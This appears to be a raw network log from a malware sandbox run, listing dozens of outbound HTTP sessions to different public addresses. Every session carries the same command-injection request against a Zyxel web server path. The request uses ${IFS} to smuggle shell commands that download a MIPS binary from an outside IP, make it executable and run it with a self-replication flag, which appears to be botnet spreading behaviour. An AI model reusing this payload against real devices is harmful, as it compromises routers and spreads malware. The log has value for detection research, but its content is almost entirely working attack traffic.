                                                      Feb 2, 2024 06:35:46.493170977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2839192.168.2.1455394197.210.212.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.493186951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2840192.168.2.1456598146.178.85.229443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.493216991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2841192.168.2.144988235.24.104.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.493267059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2842192.168.2.143530295.161.44.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.493292093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2843192.168.2.144168036.144.104.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.493323088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2844192.168.2.1437398168.171.47.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.493376017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2845192.168.2.1455070162.71.61.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.493428946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2846192.168.2.1438920140.199.228.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.493465900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2847192.168.2.143468067.19.152.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.493510008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2848192.168.2.1436262207.123.200.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.493551970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2849192.168.2.143369682.112.95.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.493594885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2850192.168.2.1447138138.144.108.5443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.493607998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2851192.168.2.1459152117.187.249.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.493664980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2852192.168.2.143946263.91.230.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.493710995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2853192.168.2.1443042196.211.84.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.493731976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2854192.168.2.1441078146.80.194.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.493769884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2855192.168.2.14353101.201.135.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.493813992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2856192.168.2.1432782170.100.103.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.493865013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2857192.168.2.1457664188.99.23.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.493906021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2858192.168.2.145782463.24.130.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.493949890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2859192.168.2.1443028151.3.28.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.493977070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2860192.168.2.1439450201.159.197.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.494003057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2861192.168.2.1451294197.172.225.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.494044065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2862192.168.2.144798086.86.0.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.494075060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2863192.168.2.1451414107.63.232.202443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.494112015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2864192.168.2.1449224133.155.81.217443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.494143009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2865192.168.2.1434482191.208.73.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.494183064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2866192.168.2.14350865.98.167.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.494216919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2867192.168.2.145815696.117.216.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.494246960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2868192.168.2.145037659.17.215.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.494282007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2869192.168.2.1458032166.214.50.97443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.494342089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2870192.168.2.144902089.7.138.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.494369030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2871192.168.2.144867040.69.34.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.494402885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2872192.168.2.1460440115.101.100.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.494450092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2873192.168.2.1451948156.90.49.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.494478941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2874192.168.2.1459304163.19.227.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.494509935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2875192.168.2.14448082.197.142.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.494529009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2876192.168.2.145332634.185.173.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.494571924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2877192.168.2.1441536157.94.169.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.494605064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2878192.168.2.143501059.235.227.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.494646072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2879192.168.2.1458322160.168.147.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.494694948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2880192.168.2.1437246183.207.45.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.494740963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2881192.168.2.14592269.252.218.188443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.494761944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2882192.168.2.1442956203.240.130.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.498609066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2883192.168.2.145588213.169.25.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.498651981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2884192.168.2.1455882140.210.87.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.498686075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2885192.168.2.1453048190.13.226.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.498747110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2886192.168.2.14547781.54.52.188443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.498795033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2887192.168.2.1439182104.146.216.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.498821020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2888192.168.2.1449756201.169.103.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.498851061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2889192.168.2.145594497.250.7.253443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.498893976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2890192.168.2.14433701.150.243.58443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.498936892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2891192.168.2.144223879.126.180.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.498967886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2892192.168.2.145385647.93.8.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.499010086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2893192.168.2.143958897.195.90.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.499058008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2894192.168.2.1435836211.3.68.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.499102116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2895192.168.2.1452664116.219.96.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.499160051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2896192.168.2.1437762100.46.11.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.499183893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2897192.168.2.1454562188.228.177.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.499232054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2898192.168.2.1460448111.118.188.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.499264956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2899192.168.2.1437816185.143.85.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.499294996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2900192.168.2.145856843.85.205.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.499351025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2901192.168.2.1447194112.176.39.39443
                                                      TimestampBytes transferredDirectionData
